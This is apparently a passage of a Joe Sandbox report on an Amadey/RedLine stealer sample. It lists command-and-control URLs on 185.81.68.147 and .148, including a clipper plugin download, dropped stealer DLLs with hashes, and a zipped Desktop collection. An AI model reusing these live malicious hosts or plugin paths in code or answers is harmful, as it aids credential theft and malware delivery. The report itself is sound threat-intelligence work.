http://185.81.68.147/7vhfjke3/index.php?wal=1f	rundll32.exe, 00000004.00000002.2137915053.0000021E08558000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: phishing	unknown
http://185.81.68.148/8Fvu5jh4DbS/index.php:	Gxtuum.exe, 00000001.00000002.2924314576.0000000000DFB000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: phishing	unknown
http://185.81.68.147/7vhfjke3/Plugins/clip64.dll	Gxtuum.exe, 00000001.00000002.2924314576.0000000000DFB000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: phishing	unknown
http://185.81.68.147/7vhfjke3/index.phpX	Gxtuum.exe, 00000001.00000002.2924314576.0000000000DFB000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: phishing	unknown
http://185.81.68.148/8Fvu5jh4DbS/index.phpded	Gxtuum.exe, 00000001.00000002.2924314576.0000000000DFB000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: phishing	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
185.81.68.147	unknown	Finland		50108	KLNOPT-ASFI	true
185.81.68.148	unknown	Finland		50108	KLNOPT-ASFI	true

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1574259
Start date and time:	2024-12-13 07:46:10 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 6m 58s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	23
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	tOuVwTJrau.exe renamed because original name is a hash value
Original Sample Name:	4962575a2378d5c72e7a836ea766e2ad.exe
Detection:	MAL
Classification:	mal100.phis.troj.spyw.evad.winEXE@30/23@0/2
EGA Information:	Successful, ratio: 80%
HCA Information:	Successful, ratio: 99% Number of executed functions: 58 Number of non-executed functions: 253
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
Excluded IPs from analysis (whitelisted): 52.168.117.173, 20.12.23.50, 4.245.163.56, 13.107.246.63
Excluded domains from analysis (whitelisted): onedsblobprdeus16.eastus.cloudapp.azure.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com.delivery.microsoft.com, blobcollector.events.data.trafficmanager.net, ctldl.windowsupdate.com, umwatson.events.data.microsoft.com, wu-b-net.trafficmanager.net, fe3cr.delivery.mp.microsoft.com
Execution Graph export aborted for target powershell.exe, PID 6944 because it is empty
Not all processes where analyzed, report is missing behavior information
Report size exceeded maximum capacity and may have missing behavior information.
Report size getting too big, too many NtCreateKey calls found.
Report size getting too big, too many NtDeviceIoControlFile calls found.
Report size getting too big, too many NtEnumerateKey calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

Simulations

Behavior and APIs

Time	Type	Description
01:47:02	API Interceptor	914181x Sleep call for process: Gxtuum.exe modified
01:47:25	API Interceptor	86x Sleep call for process: powershell.exe modified
01:47:48	API Interceptor	1950022x Sleep call for process: rundll32.exe modified
06:47:02	Task Scheduler	Run new task: Gxtuum path: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
185.81.68.147	yINR7uQlPr.exe	Get hash	malicious	Amadey, RedLine	Browse	185.81.68.147/VzCAHn.php?1DC30FADAFF92643095942
	file.exe	Get hash	malicious	RedLine	Browse	185.81.68.147/tizhyf/gate.php?0CD020845398340779059
	file.exe	Get hash	malicious	Amadey, Credential Flusher, LummaC Stealer, RedLine, Stealc, Vidar	Browse	185.81.68.147/tizhyf/gate.php?2DB3A69DE7692371543510
185.81.68.148	yINR7uQlPr.exe	Get hash	malicious	Amadey, RedLine	Browse	185.81.68.148/8Fvu5jh4DbS/index.php

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
default.qdr.p1.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com	Ziraat Bankasi Swift Mesaji.exe	Get hash	malicious	MassLogger RAT	Browse	217.20.58.101
	igmbio.pdf	Get hash	malicious	Unknown	Browse	217.20.58.99
	4JwhvqLe8n.exe	Get hash	malicious	Unknown	Browse	217.20.58.100
	NOTIFICACIONES+FISCALES+Y+DEMANDAS+PENDIENTES.pdf.pdf	Get hash	malicious	Unknown	Browse	217.20.58.100
	OR8Ti8rf8h.exe	Get hash	malicious	AveMaria, DcRat, StormKitty, VenomRAT	Browse	217.20.58.100
	Event Schedule.xlsx	Get hash	malicious	Unknown	Browse	217.20.58.100
	Request for Quotations and specifications.pdf.exe	Get hash	malicious	MassLogger RAT	Browse	217.20.58.98
	Tyler_In service Agreement889889.pdf	Get hash	malicious	Unknown	Browse	217.20.58.101
	https://download-695-18811-018-webdav-logicaldoc.cdn-serveri4731-ns.shop/Documents/Instruction_695-18014-012_Rev.PDF.lnk	Get hash	malicious	Unknown	Browse	84.201.211.22
	Employee_Letter.pdf	Get hash	malicious	HTMLPhisher	Browse	217.20.58.99

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
KLNOPT-ASFI	eHCgK6fZc2.exe	Get hash	malicious	RedLine	Browse	185.81.68.147
	yINR7uQlPr.exe	Get hash	malicious	Amadey, RedLine	Browse	185.81.68.148
	file.exe	Get hash	malicious	RedLine	Browse	185.81.68.147
	file.exe	Get hash	malicious	Amadey, Credential Flusher, LummaC Stealer, RedLine, Stealc, Vidar	Browse	185.81.68.147
	tjpq0h4wEH.exe	Get hash	malicious	RedLine	Browse	185.81.68.147
	file.exe	Get hash	malicious	RedLine	Browse	185.81.68.115
	file.exe	Get hash	malicious	RedLine	Browse	185.81.68.115
	file.exe	Get hash	malicious	RedLine	Browse	185.81.68.115
	LxYpBRhMBx.exe	Get hash	malicious	RedLine	Browse	185.81.68.115
	file.exe	Get hash	malicious	RedLine	Browse	185.81.68.115
KLNOPT-ASFI	eHCgK6fZc2.exe	Get hash	malicious	RedLine	Browse	185.81.68.147
	yINR7uQlPr.exe	Get hash	malicious	Amadey, RedLine	Browse	185.81.68.148
	file.exe	Get hash	malicious	RedLine	Browse	185.81.68.147
	file.exe	Get hash	malicious	Amadey, Credential Flusher, LummaC Stealer, RedLine, Stealc, Vidar	Browse	185.81.68.147
	tjpq0h4wEH.exe	Get hash	malicious	RedLine	Browse	185.81.68.147
	file.exe	Get hash	malicious	RedLine	Browse	185.81.68.115
	file.exe	Get hash	malicious	RedLine	Browse	185.81.68.115
	file.exe	Get hash	malicious	RedLine	Browse	185.81.68.115
	LxYpBRhMBx.exe	Get hash	malicious	RedLine	Browse	185.81.68.115
	file.exe	Get hash	malicious	RedLine	Browse	185.81.68.115

JA3 Fingerprints

⊘No context

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\clip64[1].dll	yINR7uQlPr.exe	Get hash	malicious	Amadey, RedLine	Browse
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\cred64[1].dll	yINR7uQlPr.exe	Get hash	malicious	Amadey, RedLine	Browse
C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe	yINR7uQlPr.exe	Get hash	malicious	Amadey, RedLine	Browse

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\cred64[1].dll

Download File

Process:	C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	1281024
Entropy (8bit):	6.466046469058072
Encrypted:	false
SSDEEP:	24576:BO//kL3TtMhQsnoXyajMK8fCZEqcAxQBuLv8YPKpTG:z3pMhQzRM3MfcAxHv8t
MD5:	C6AABB27450F1A9939A417E86BF53217
SHA1:	B8EF3BB7575139FD6997379415D7119E452B5FC4
SHA-256:	B91A3743C7399AEE454491862E015EF6FC668A25D1AA2816E065A86A03F6BE35
SHA-512:	E5FE205CB0F419E0A320488D6FA4A70E5ED58F25B570B41412EBD4F32BBE504FF75ACB20BFEA22513102630CF653A41E5090051F20AF2ED3AADB53CE16A05944
Malicious:	true
Yara Hits:	Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\cred64[1].dll, Author: Joe Security
Antivirus:	Antivirus: ReversingLabs, Detection: 34%
Joe Sandbox View:	Filename: yINR7uQlPr.exe, Detection: malicious, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........D........................s.................................................X..........Rich...........................PE..d.....Zg.........." .........8...............................................P............`..........................................~..X....~....... .......`...............0..l.......p...........................p...8............................................text............................... ..`.rdata..............................@..@.data............D..................@....pdata.......`......................@..@_RDATA...............t..............@..@.rsrc........ .......v..............@..@.reloc..l....0.......x..............@..B........................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\clip64[1].dll

Download File

Process:	C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	126976
Entropy (8bit):	6.36076412023942
Encrypted:	false
SSDEEP:	3072:Vdu5ZXB8ZuzQT7SgmME8Yn/YoZ3SNqpidU1epf:WjGymSg7E8Y3Z3AdUwpf
MD5:	C2F3FBBBE6D5F48A71B6B168B1485866
SHA1:	1CD56CFC2DC07880B65BD8A1F5B7147633F5D553
SHA-256:	C7ED512058BC924045144DAA16701DA10F244AC12A5EA2DE901E59DCE6470839
SHA-512:	E211F18C2850987529336E0D20AA894533C1F6A8AE6745E320FD394A9481D3A956C719AC29627AFD783E36E5429C0325B98E60AEE2A830E75323C276C72F845A
Malicious:	true
Yara Hits:	Rule: JoeSecurity_Amadey_3, Description: Yara detected Amadey\'s Clipper DLL, Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\clip64[1].dll, Author: Joe Security
Antivirus:	Antivirus: ReversingLabs, Detection: 47%
Joe Sandbox View:	Filename: yINR7uQlPr.exe, Detection: malicious, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........P...................................................................@......@......@.~.....@......Rich............................PE..L.....Zg...........!.....D..........bp.......`...............................0............@.....................................P.......................................8...............................@............`..L............................text....C.......D.................. ..`.rdata..*u...`...v...H..............@..@.data...............................@....rsrc...............................@..@.reloc..............................@..B........................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	64
Entropy (8bit):	1.1940658735648508
Encrypted:	false
SSDEEP:	3:Nlllulp07j:NllUa
MD5:	732C6F327F6158795C5B7B9B5836F748
SHA1:	B470FC8B70D840DCA9C435F638C2B9A610BDCC4C
SHA-256:	517F81F536702082A40FC866C90755A46D024AF38582FAF43DE765808118ABB7
SHA-512:	7F762E287ED7D65F6AD2899C9F1FA6F827DBCEB254DA2B24AD8E62EB2C318AA62B1D98995666680AD74F82FAE8DAC553D4551C5F1810C063E91C6A09D10D34CE
Malicious:	false
Preview:	@...e...................................\............@..........

C:\Users\user\AppData\Local\Temp\246122658369_Desktop.zip

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	Zip archive data, at least v2.0 to extract, compression method=deflate
Category:	dropped
Size (bytes):	4615
Entropy (8bit):	7.784266265218416
Encrypted:	false
SSDEEP:	96:aWBPwzYgAqRzuqFBGvLv/2+8R6CbsTWfAcNMXxRrffAcNMXxRnmRv/Y+R:aWBPwzYgXpQj4jb2wNMBJrNMB1mRvA+R
MD5:	59419804CB074B418F154DF7004F4EE3
SHA1:	52DFD704F33ECD00320A301B3B3639CB03F65310
SHA-256:	5C2F9E161DA9093114A3F2AFDFD227CDF90D5E8A2F7D6F47452AD3605070C5AE
SHA-512:	DB56775C293BCE91DC47E9FA3761B10CD6F0D2E5116FCE7834476ADD83BE8D577B10FFB8AC1EDE1DE13D7499DBDE2C8A8FF79112E71AA34CBD34107698F49C67
Malicious:	true
Preview:	PK........Q@DW..............._Files_\DVWHKMNFNN.xlsx..Ir@!.D....?....p...l....aeA..K...E.....[.ph..kQ..T..j.uUnVT.$U...K7+}lZ..I.](.X..5b>..M.".uSl....u....\|.c..'}.U ....2.'....U0A..qO..v.9X.Z...n.E}....us..,]...[g.:..-...6:_.PK...H...=..P...q....).@d^..Ou..W.S.=.....d..[!..L...rr]C.M&S.E}.e:>K.[...U.......;.F.Z.vW.6.,.r.[...hh;......\.Cm.p......-_..d..Q.. .i.6..J..........\|.C.Dp.....).....o8.,...SV..2\$p.eNG......^.(-....7...RA.j......q..U;...<#VZ.Ut...6......h.........2.Kf......j8.......>W...u...4..d..z.>...s..9.p.Q.)...t<...`.m..R.(.\|w.!.....J.y.]j...-......[.-{3..W.=..\.M<O..$...}...G.;n..N.......w.W...f..$.y.$jw...N7..=:.....K..=..."[?2....PK........Q@DW.1n............._Files_\KATAXZVCPS.xlsx..I.@!.D....p..N.........U.D..w.......D.6...l.ZI.(Vc.....E...7{..cx.Z.t.h.......yHj...!.......\|....9g.......`....).p..fU{...5...Q.fo.k..iV.8ug3..6....K..=....2{.usK.%;.l....W<.G.;I.:v.\|.W...).g..~j.9t#...z?..R.+&."4.?..rcC..m#_.].RMZ

C:\Users\user\AppData\Local\Temp\_Files_\DVWHKMNFNN.xlsx

Download File

Process:	C:\Windows\System32\rundll32.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.694985340190863
Encrypted:	false
SSDEEP:	24:fGg1AbmVALQm72DOg+8XDQzjmyhdsENw8TRlrlGpKTkA+oBK:fv1AiVAUmyDruzj37sENjlSKAA+oU
MD5:	C9386BC43BF8FA274422EB8AC6BAE1A9
SHA1:	2CBDE59ADA19F0389A4C482667EC370D68F51049
SHA-256:	F0CC9B94627F910F2A6307D911B1DDD7D1DB69BAD6068EF3331549F3A0877446
SHA-512:	7AACA07E8A4B34E0F75B16B6F30686AC3FB2D5CBDAD92E5934819F969BAFF59385FB8F997334313EA5938FD955D6175C4548D6B1F915D652D9D9201C9418EF83
Malicious:	false
Preview:	DVWHKMNFNNSXRPFRFSVVCQPXSKWHKPJJHYQWYYFONAJQSCOHZADBHUOWOSPDVAOIQVOBHGMIENZQZLABYDKWXGSUQNSEINIQSVMZZWTJLYMGYBQHIJSUWZKJPGBZUGFOXNAMLQTVGWDCYDMNHGVRTUWNHIWXJNQONTAXVVVCFDLWYDVWNMKHRFTZAVEQPXZHSEXPEHWUHPJZDMDXPYEJBYWZOQETVPLRKQRCYTAXMNRBOUJSCYZOUPOBJUWFDMUYFBXCBLZHFHONIURELJQVLWAJRIQCHHASBUAREPSIMJIZDUKJCHMMSSWSEDFHFQOUVYZORWJIUACXUVQKUMLXTQIKDBVNZOHJYYECOBYPNRILKERBHKZPVUSQLHAQRTPWCRMZADYONIIOVUWOBVHAUGZVAGTZTZBMHSOOQORENTXCJFMVWMGLOOXBDWANXXJQQTBDTWOSPFMFVQKLNTSHOPQMHYRYZMWDXVFGWFOSCSFMKCDDHTOQHBTQAFQTXPUHHEAKYRCQIODCCSHRSAJQEFRHCQLQVVMUHWOHHQJPSHCNKRLIRESUXLZIYSWDHHYZVRKLAGFLVTEJQHEEMVUUEQKQMTBDXFGSROZTNPLCVTEEZGUUCQUEKNMQFATATJRARXQQMZYEVACDAXILYPEHYTJOQWSFAJEGHIDIXMKDXPATNSATPECIMRBZNBXXVMGPLMVEKCUOXJWFGQSTWPMTEMRCYGXECVTNKYROYRYTPRDPCFGGKUUBXXSDFZEJCQRIRFLCNMPMLIGUCYPHMWYVAIPAAPHTQAYFSJWLSCZICIXZHXNKAKRHJVENGZTUTVWSNYDDYMWQHHAITLUZXNORBLYTBVCEBWBMSVZXNZMKYFPRFPLFCUSJUWNKQJIZRVZASPVFSUSBYQZZWKEORBDDRCYRBTIMTLHDTZRQUKYJIWHXVJYPEZSDLWZVPZGEYQPCSGGVJXXBUCNBXKQPZTMTVPZUETYYLRJEDWIHAZMS

C:\Users\user\AppData\Local\Temp\_Files_\KATAXZVCPS.xlsx

Download File

Process:	C:\Windows\System32\rundll32.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.699548026888946
Encrypted:	false
SSDEEP:	24:pjU7tPjIpNf9XSXm/5eskkSAjuenNF0hE6mHPISZMqEv:pjU7xIpfXSipuenT0hvYIV
MD5:	A0DC32426FC8BF469784A49B3D092ADC
SHA1:	0C0EEB9B226B1B19A509D9864F8ADC521BF18350
SHA-256:	A381579322A3055F468E57EA1980A523CAF16ABFE5A09B46EC709E854E67AA01
SHA-512:	DAF85E375438A2A6CC261D75D672A9C43E80E6CB1BC1EAA1BDB7B798CDE22AEFD5A04AC1D10E6F24CDBB7F9EA0452F5CA790969C750B764B4B7F9E0C5B2A0731
Malicious:	false
Preview:	KATAXZVCPSXDNCRGTIEAHLTBMQUFAYSWEMLQOMHMIKPDECBCOYPMSTTHHPDKZNGFGWCNUUGIGXPEBWCPRKDGBOWPSNMTFYIHVYITPQGJYFOAJMWVQDHVSMYHPXFGNOURBBIVVVMRPWBBLQXUCAXUFAYRSTCKWXAAMKJJZILVYZNBPSMXAGXZDASFVGKBTHNGETLQIHPRIVPIVHVCSRDUBEGENZMHSYQLROJPZILEYZIFDADQNRGHABZNQMPQMEVKVERETAQUHUXWKYTSUKUXMTSIPUXJRNZOLPGLRSFBCHYWGMRDPLBUIIFHFUNFWRALBUPZLDJUHIMNWKMISYIKAQGSLGBWBFUXASKUFXDTLJAXOSBBQTQJNJAVJQLQEFEKRWWXRJNJSWYQQKPEAVJRUZGKJUAZLPHMOTXLNXAZINYPNPZNGRMVYVCYPPHKTYJCBWNURXFTCITKLDRSFMIHFZHIDPGLOTHCQFZZEHIEXWNNZRJQLWYMVUHTXHFFDTYBHDRBRNTPLBXPVFCUVAJOYOWRENFUXTSCNCCQJOSITCFTGJHFQCYISKUAVSRYASWVJRDNOYYCSYOZWHRPNSBWMHUUEYUGOXVSYKLFZAUQJZDVBEBHHGXQHZVJWNUGLSAYWIEHAJCPIOHOPCXKNVRISBGUAEMSYEGNPQXITRIIMXOLIJYUBIEQGZQUAHRWMKQHCRHKBJZQQXFYTNBHEJEWRPZRXZCXRJQVIUOATJAEYDILREREDIWFEMISEKZWNCDTIPTTOZXOZJIYMGKYIKXBLURVWBJHYFJCLGVVIMADULTTVZIOEIPMVJAOPSQCDFMYPSPGLBIQXTWTUZERGBDTCIRRVRTNGENXXRTHESXQFUQSRGUQDQWGTGXTSGDYWIQVOKABAIAJIEUVYCZXNYVKPRREMYAVDFDHWOGEKALUPBHOHENIHLFJZAHVTJIQJBKXOYIOELCIIECJBPTTASBEKGOESRDFBACPOTNMRZOG

C:\Users\user\AppData\Local\Temp\_Files_\ONBQCLYSPU.docx

Download File

Process:	C:\Windows\System32\rundll32.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.699434772658264
Encrypted:	false
SSDEEP:	24:Khfv+VFngw6i0t5Ut+l3kHwMDkhBlBAMFPxYaija:pvl6Pt5uQ3kQ0khBl1VxYpu
MD5:	02D3A9BE2018CD12945C5969F383EF4A
SHA1:	085F3165672114B2B8E9F73C629ADABBF99F178D
SHA-256:	6088E17DB4C586F5011BC5E16E8BF2E79C496EB6DAE177FF64D9713D39D500CA
SHA-512:	A126D98EE751D0FB768E4DB7D92CBC6AE7852FEE337B85ED045D871DB321C6C98FD58A244D058CA3F41348216C68CB4A37FA854980BB16D358AA62A932DD867E
Malicious:	false
Preview:	ONBQCLYSPUBDAQCIGYNWXHPENQNLJZGXCHXSNXZNCZBUHYDXPEMCJPAWYQSVHMGKHJUFFFYDAXDAHOLOAZEPTWZTWDGPFLXMMCXLCIIJOXMVRNMUMTICVHQSWNAGIYCQBOZZHONWWBXKDUJYBRPSLNFGTUIFTNGJEATOXKHEFMERAQZVBMQGKZUKXDBMGRJDOOGATZZKQMEZJRWZVAZRPQTVWPETCIMLPMYNWZLVLXRPUUKLNIMTYDNYIJTZEFJDNMWTOFFKRRINCRDCFGJAJNMYQHGXGVHVYPEUFBNUIGUVGBYQKIAJLIVACVIHEGZIYKSROURNGZSCTUKBKFFCGPXAONPDEBIZJRKCFYHATDXLXYKGLWXBCHJERCRNMKESIMBDNPMPBWXSVSEAAUEKEGUIJBZLAESAFZHMBLPPKMNTZAZIIYSHMWJBFTZZSKYNFJYSBRLGVHOWZUQHXUSSJESIEKHZLTLILMSMJZHXFWGJQNWQCDLXEWBZPGBTVDVCPPUFLFGNZRUKJOANJVXVTXLOQLFUIVEWTCBKOBYZMAOTIMQMJYRYLSOLSSACCLCFTVXCKKJDNWQAETNXHIOQCDTXLLVEQLNLGDIOULNFNNDXTVYYSPDWWZHDSYHBRXMUAAHJIGSGLSFKCGADPUAASYZFEZWHYDLQDUCHJXMNMTNCDCMNIJQCSGEQOGVGYBYPMTZBBFOACZMMKVFNELOMGSTCQUDRFKLFGOHOTZKZCWJWDRECGYETFYOWLYECGICMGUKZRVNHUQTLQLHUTPRZXBVYMPAFBLSWKSSKBGWCWBFEEZIAZUZGEYMYBSXYUCHEALFJRSGWQJMABNQHSZANDDTYMVJKXFFFDEENZAGRGVLHFELVOSGTXVOOPFGCQDSFWOYKKOYUHFWMXWPLHFIIPORMEJNOFYMJRBAZLYTIOKEFIWPDZUKMIWKLZXBOESUCXZXQSCMQKDKFBCHJMPMZHELLNSYYEJNBRRXVBMPD

C:\Users\user\AppData\Local\Temp\_Files_\UMMBDNEQBN.docx

Download File

Process:	C:\Windows\System32\rundll32.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.695685570184741
Encrypted:	false
SSDEEP:	24:SYuCgqv/1uycbC6SHsJPWXpOxTeVtblICcFX4xlyzK7y45wR39IRh:S1CPvsC6YE+XgleVtbQuKGf5M39IRh
MD5:	A28F7445BB3D064C83EB9DBC98091F76
SHA1:	D4E174D2D26333FCB66D3FD84E3D0F67AF41D182
SHA-256:	10A802E683A2C669BB581DE0A192C8291DD2D53D89A2883A59CC29EB14453B93
SHA-512:	42526FEC4220E50DB60BD7D83A07DEB9D5BE4F63AD093B518E9ECC86B779210B0170F6F64C9F16064D50CB12F03643BAC9995D4F3C0AFD5F8D38428D57ADE487
Malicious:	false
Preview:	UMMBDNEQBNVIMBNGHYZCBKXWMQJKYISTANSRNFXXBKALIIEMEWAFQEPTEMZCIXXNMQBGOXWSDYSAWKIYPJITNREMVRXPPJZFUTMGRRRGTCHVLEWVUJGZEUQVONQVACEFWZUCIAFXPFGXIUOOBZEEMGMWJQIEKKICYJJWAFUKYZAJEGUQKGDPRPXCOWIPBRUGHWDFZLGSKZVCHVVPGLEFNGIVLBVNAOVXAPGATADJBIQTBNJGWXRSEYKCSVZOSTCBHYFHUDEWNGEIFCVREPZDZDZRITFEVFCQQWJYZXPUKJWHTWGWASTKDCAVEWZOIGFZHRWCJBVRLDWGVKPABCQUOHQIMLUFUGYGMPGPEMSRPPSGWIGRVPBGZIWLNEVYFFJBCMBSXVABNRNXULCTUAANAXDHKZOGVCNQZHMRBENWTTLQVVMDLNBEWHLPZHMPDGRLJWAQJDJRCWTFWIOLAURRCSMFJOCFDKUGPLTPABARXKPCRXOIHHVRWXAKGHOTYLCEQQYYDKVZQSYLCAEGGBQMMJGSNJWBTJXSVALINNRLURMPNGFXHJRVJIKQJSDLNIOXGIGDFDCOTGGXMDLTDYSIKCMPVINDDXXQCEQCRUBLFEWMYMSEGUHIKIGUYOMOXSKOTVNUNGWUFYKYRNZXOOTSRYXLZHRZXNEDJUNPYGNIIZSPVQBOLBRRRWGDMQWUTRSZWBYMXNMLKLFNZWJVDDPMJOXTVBMYRXNQFGBLURKFIUAHJBFFXNWQDYRLZADYGMETNXEOXLOJKYQPEYHUVTFGXQTGPQBWZQTVFXZFUVQERQZJCYYPFBYONAVFDOLTNRGWQYGSYWCWUWRETJZGVJMEFQTYPOLONVZFREVORMBQJOCLOALCJHHCHQSHKLUNBIRHRBSQSMERLKKFTGHUQKRPFIIELZZVXZVNHCIQYYXNMJNSOZOIRGGJKUWXNCWSNCFMGQIQVNKVIGRCLSDWQPEDLSLTGBRXRTMGFWYQSCLN

C:\Users\user\AppData\Local\Temp\_Files_\VLZDGUKUTZ.docx

Download File

Process:	C:\Windows\System32\rundll32.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.701757898321461
Encrypted:	false
SSDEEP:	24:JTbqccbbEKOWHOHPG9HXJMTwDwW63KkUdx/d:JTbmzOxeRaTaq3KBL/d
MD5:	520219000D5681B63804A2D138617B27
SHA1:	2C7827C354FD7A58FB662266B7E3008AFB42C567
SHA-256:	C072675E83E91FC0F8D89A2AEC6E3BC1DB53ADF7601864DDC27B1866A8AEEF4D
SHA-512:	C558140907F6C78EB74EE0F053B0505A8BB72692B378F25B518FA417D97CCB2D0A8341691BECAA96ADCE757007D6DC2938995D983AAC65024123BB63715EBD7C
Malicious:	false
Preview:	VLZDGUKUTZXKWULZBWDOTEIBVHVGPZOMETVGLHEKQQVYNUMUAOLBNSHZYTRKXENILISUHDAEEZWZEUNNMWJTKJJOLHKIGJBIHEMLZPVHEUDLHUZCSBUYGAPQSLHCFWHXEYFYTFGZTQNGXBIUAIOYCCCESLXKQMZDVXCDPKMYSWUFQOOGYCQASGJXLVOEKXBOBXDUKGAWAMSEHSFOUBZESSHGPVUWBSAXMDDSNTFJRIJVCYNCFLCMAYHAQBOVOYCQICAPOEIAOZZDHRFCBPBIJRAALGUMCZXSSRKWWTLWRCAGMBKLQATMELORFDRFOPMXYZUWVDECUBFKJYGAVNPIZHJACVPSNOSYGMZANGHNGZCHMGRVBLZWYXERUYHSGKNYMBIUOUVRRQZNFUEYVDSYNZOGCQQJBPAGGARUGCQGPSYMVKYFEATFTUASPFCLAYVPLRCXWCNIABDDVKSFBVZOWZJRZCFQZOXEFZYNRBPBMSHMJFACGUVZUTNGJUEWYWGPCEUFNJTHREUEIHDYXUSJMKBAJVWGYJBJZIRJSRNLDQEVFZAKVMKFJSIHDAKHIEZERYMCSJLFMAKTAGUIBEYUESOJBCXDNFVMNZJABIUVYPQJTWFYBZJPMWLOIHNHFGQHJMNWDFCATRHJYRIXKFJEEOLVSFDPTZNPUFUNEEOLRHVCPOPPOMEZBYTGJKKWUQRHCTFVKQBJAPTOLZADSWVPJYRGRDUWSTNCXLPQDMPVWSSFEHFWHSYNGNHOYZMFADSOTZRZJWXBGUPDZLPMKTZHVIXOFUFHPBTLFRGMMRKOTCWSSRSSXZJNZJGFXMQMXYXKQOFUEAKEJMGPTQUQWYKCZWFGOGJXTRBDEBXQWSDHUFBWIRPNOOENTWWFRIBLZBMAFTMZPLFLLVKTGMUXNKLRFNYLEFNKJWPWNLANWBRDASFRDJUPHVZRHEFBINQCKMOVMQOLDBWPTMYMMFRCLWITZRVFLDSOIFRMJCCQXYLT

C:\Users\user\AppData\Local\Temp\_Files_\VLZDGUKUTZ.xlsx

Download File

Process:	C:\Windows\System32\rundll32.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.701757898321461
Encrypted:	false
SSDEEP:	24:JTbqccbbEKOWHOHPG9HXJMTwDwW63KkUdx/d:JTbmzOxeRaTaq3KBL/d
MD5:	520219000D5681B63804A2D138617B27
SHA1:	2C7827C354FD7A58FB662266B7E3008AFB42C567
SHA-256:	C072675E83E91FC0F8D89A2AEC6E3BC1DB53ADF7601864DDC27B1866A8AEEF4D
SHA-512:	C558140907F6C78EB74EE0F053B0505A8BB72692B378F25B518FA417D97CCB2D0A8341691BECAA96ADCE757007D6DC2938995D983AAC65024123BB63715EBD7C
Malicious:	false
